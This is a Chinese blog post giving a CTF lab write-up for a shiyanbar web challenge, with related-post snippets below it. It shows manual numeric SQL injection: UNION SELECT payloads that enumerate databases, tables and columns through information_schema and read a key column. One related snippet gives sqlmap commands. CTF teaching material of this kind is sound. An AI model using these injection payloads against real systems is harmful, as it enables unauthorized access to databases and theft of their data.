决斗场 - 实验吧 WEB 这个看起来有点简单!

最新推荐文章于 2022-09-23 23:02:05 发布
最新推荐文章于 2022-09-23 23:02:05 发布
阅读量1.3k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全_WEB 实验吧-CTF题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RaAlGhul/article/details/78730603
本文详细解析了实验吧CTF挑战中的一道SQL注入题目,通过手工注入方法,逐步揭示了如何确定注入、爆库、爆表及爆字段的过程,帮助理解数字型SQL注入的实战技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:http://www.shiyanbar.com/ctf/33


今天小编在写这道题题解的时候才发现,原来实验吧有这道题的视频讲解。看了一下,视频讲的不是很清楚,而且用的还是sqlmap进行注入的,那么小编这里还是用手工注入的角度来讲解一下这道题如何去注入。

这道题其实蛮简单的,点开题目,我们能看到一个疑似sql查找结果的表:


看下URL,我们可以看到URL中传入id=1这个参数。

那么第一步,确定是否有注入,确定的方法当然是经典的单引号、1=1、1=2。

尝试发现这里是存在注入的,那么接下来我们开始爆数据库,爆表,爆字段。

首先是爆数据库:

union select 1,schema_name from information_schema.schemata

这里我们爆出的数据库,可以看到爆出my_db这个数据库。

接下来我们爆表:

union select 1,table_name from information_schema.tables where table_schema='my_db'

爆出的表中我们可以看到thiskey,应该这就是我们要找的表。

然后是爆字段:

union select 1,column_name from information_schema.columns where table_name='thiskey'

很明显这个k0y就是我们的目标字段。

最后查询这个字段得到我们的结果:

union select 1,k0y from thiskey

因为这道题似乎没有对一些字段进行过滤,所以我们注入非常的轻松^v^。


这里回答一下上一次在"简单的sql注入"题解下面问我关于单引号的问题的那位同学。

我们在sql注入的时候,什么时候用单引号闭合的问题要根据实际情况进行分析,像这道题为什么没有用到单引号进行闭合呢?因为这道题的注入的参数类型是数字型,所以后台的查询应该是

Select * from 表名 where 字段=1
但是如果参数的类型是字符型,后台应该为: 

Select * from 表名 where 字段=’字符’
所以只有遇到字符型的时候我们才需要用单引号进行闭合。






决斗场 - 实验WEB Once More
RaAlGhul的博客
03-12 829
题目链接:http://www.shiyanbar.com/ctf/1805hint相当良心的一题,hint上直接说明了本体非常重要的两点:1.ereg函数有漏洞 ---00截断2.科学计数法点开题目,观察这段代码:<?php if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) ==...
决斗场 - 实验吧 隐写术?No! WEB 听会歌吧
RaAlGhul的博客
12-18 2015
题目链接:http://www.shiyanbar.com/ctf/19 这道题目的分类是在隐写术中的……然而根据小编的实际操作之后发现,这明显就是一道WEB题嘛…… 点开题目链接,发现两个下载链接: 随便点开一个链接: 仔细观察URL,在URL中有一个名为url的参数,观察可以发现,这是一个base64编码,解码验证,内容就是文件名: 再观察相应头信息:
决斗场 - 实验WEB FALSE
RaAlGhul的博客
01-07 731
题目链接:http://www.shiyanbar.com/ctf/1787
这个看起来有点简单!--实验
Gunther的博客
08-31 2935
这个看起来有点简单! 手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞) 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。 查看手册sql map
这个看起来有点简单!-实验
Xi4or0uji
05-07 1408
这道题一开始点进去让人感觉有点蒙圈,不知道要考什么,后来才发现只是道简单的sql注入.........这里写两种做法。 sqlmap去跑 先去看一下有什么数据库 sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs 有个my_db的数据库,再去扫一下有什么表 sqlmap -u "http://ctf5.shiyan...
决斗场 - 实验吧 隐写术 NAVSAT
RaAlGhul的博客
11-20 591
题目链接:http://www.shiyanbar.com/ctf/2001 解题链接下载完毕后,是一个zip格式的文件,虽说是这个文件,但这个文件我们并不能解压。 那么为什么不能解压呢?首先,我们用记事本(Nopepad++)打开这个文件: 打开之后我们会发现,文件的开头是两个问号。但是真正的ZIP文件开头应该是由PK开头的,那么这里我们把这两个问号改为PK,然后解压。
Web3 社交与游戏融合的万字浅析
qq_32193015的博客
09-23 1024
Web3 社交与游戏融合的万字浅析
Deep Reinforcement Learning : An Overview(Yuxi Li) 学习笔记
weixin_44412076的博客
03-14 4075
翻译的比较粗糙,仅供参考。 2.2 Deep Learning 深度学习与浅层学习形成对比。对于许多机器学习算法,如线性回归、逻辑回归、支持向量机(SVMs)、决策树和增强等,我们有输入层和输出层,在训练前可以用人工特征工程对输入进行转换。在深度学习中,在输入层和输出层之间有一个或多个隐藏层。在除输入层外的每一层,我们计算每个单元的输入,作为上一层单元的加权和;然后,我们通常使用非线性变换,或...
黑客类型电影推荐
KHOST的博客
01-31 1万+
在多数人眼中,黑客通常是一群无聊至极没有什么趣味的人,在他们的世界里仿佛只有计算机和那敲不完的代码。但事实真的如此吗?让我们回味一下看《黑客帝国》、《幽灵》等黑客题材电影时的场景。有木有种热血澎湃,瞬间变成小迷妹的冲动?其实在现实生活中,他们也有许多乐趣和鲜为人知的经历和故事。下面,是为大家精心整理的27部黑客题材纪录片,现在让我们一起走近他们的世界。 1.微软英雄(Pirates of Sil...
写在前面的一些话:《Learning OpenCV》中文版
热门推荐
09-17 1万+
 <!--v/:* {behavior:url(#default#VML);}o/:* {behavior:url(#default#VML);}w/:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}--> Normal 0
决斗场 - 实验WEB Guess Next Session
RaAlGhul的博客
01-11 2115
题目链接:http://www.shiyanbar.com/ctf/1788 点开题目链接,是一道关于PHP审计的题目: 观察代码,在代码中并没有什么函数,关键就在于:password = $_session['password']。 问题到了这一步,让我们把这放下,先来分析一下PHP中的Session和Cookie。 Cookie与 Session,一般都会认为这是两个独
实验决斗场刷新刷新快刷新
灵感点滴的分享
11-25 2745
这个题也是个数据隐写的题,按照前面的思路走一遍。先用记事本打开没有什么信息,然后用binwalk打开, 除了一张图片什么都没有,这个就尴尬了,于是我陷入了深深的思索中,但是还是没有什么头绪............. 最后我看看题目刷新 刷新 快刷新, 于是我又想到了那个定理,重要的事说三遍,可是刷新和图片隐写有什么关系呢? 这时候就是体现程序员思维的时候了,刷新不就是F
决斗场 - 实验WEB 貌似有点难
RaAlGhul的博客
12-11 1222
题目链接:http://www.shiyanbar.com/ctf/32 又是一道基本没有提示(节操)的题目,点击链接进去: 题目中包含了PHP代码审计,那这里需要观察代码内容。 代码中包含了两个部分,一个是得到IP地址的GetIP函数,一个是通过GetIP函数获得的IP验证是否为1.1.1.1的主函数部分。 那么这题的思路应该非常的清晰,我们需要想方法使得代码中的GetI
决斗场 - 实验WEB 登陆一下好吗??
RaAlGhul的博客
11-09 891
题目链接:http://www.shiyanbar.com/ctf/1942 这是一道关于sql注入的问题。 不知道小编是不是太笨,反正我第一次看的时候一脸懵逼,完全没有头绪(T.T),看了大神们的题解才有了思路。 此题是个登陆界面,登陆的过程其实可以归纳为读取页面上的username的字符串str,在数据库中查找str对应的密码是否和页面上的password的字符串past
实验决斗场小苹果
灵感点滴的分享
11-25 1701
这个数据隐写还是原来的套路,先记事本打开不行,然后binwalk发现解压包 发现解压包用dd命令提取,这里我不多说,不会的请看前面的博文。 然后发现里面有一首apple.mp3,这里就到了mp3隐写了 把它听了一遍没有什么信息可以获取,于是在windows下载了一个mp3stego 这是一个命令行工具。 先进入到它的目录下然后再用命令Decode.exe
决斗场 - 实验吧 密码学 传统知识+古典密码
RaAlGhul的博客
11-10 1889
题目链接:http://www.shiyanbar.com/ctf/1991 此题如名,用到的是传统知识和古典密码,个人觉得这题坑的一批。 首先我们通过千支顺序得到信中的内容应该是: 辛卯,顺序为第28个 + 甲子(60) --> 88 -->  X 癸巳,顺序为第30个 + 甲子(60) --> 90 -->  Z 丙戌,顺序为第23个 + 甲子(60) --> 93 -->
决斗场 - 实验WEB 程序逻辑问题
RaAlGhul的博客
12-21 664
题目链接:http://www.shiyanbar.com/ctf/62 点开题目链接,发现是一个类似于登陆的界面: 首先以之前的一道题:登陆一下好吗??的思路,猜测后台代码为: select * from user where username='str' and password='pastr' 我们在username和password上都输入 a'='
决斗场 - 实验WEB what a fuck!这是什么鬼东西?
RaAlGhul的博客
12-18 1741
题目链接:http://www.shiyanbar.com/ctf/56 点开链接,一堆莫名其妙的符号: 当然这不是莫名其妙,这是jother编码,jother是一种运用于javascript语言中利用少量字符构造精简的匿名函数方法对于字符串进行的编码方式,其中少量字符包括"[""]""{""}""("")""!""+"。只用这些字符就能完成对任意字符串的编码,本
实验-这个看起来有点简单
苟有恒,必有三更眠,五更起。
08-09 311
这个看起来有点简单 原题链接 http://ctf5.shiyanbar.com/8/index.php?id=1 分析 id(int)型,标准新手sql注入题 报错注入,无过滤 order by 发现两列 http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,database()...
Vue.js构建的点击决斗游戏 - MatadorDeMonstro-Game
资源摘要信息:"MatadorDeMonstro-Game是一个使用Vue.js开发的简单小游戏,玩家通过点击按钮与怪物进行决斗。该项目是为学习者准备的,从Vue.js的基础知识开始构建,涵盖了基本的游戏开发流程。整个游戏主要采用HTML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值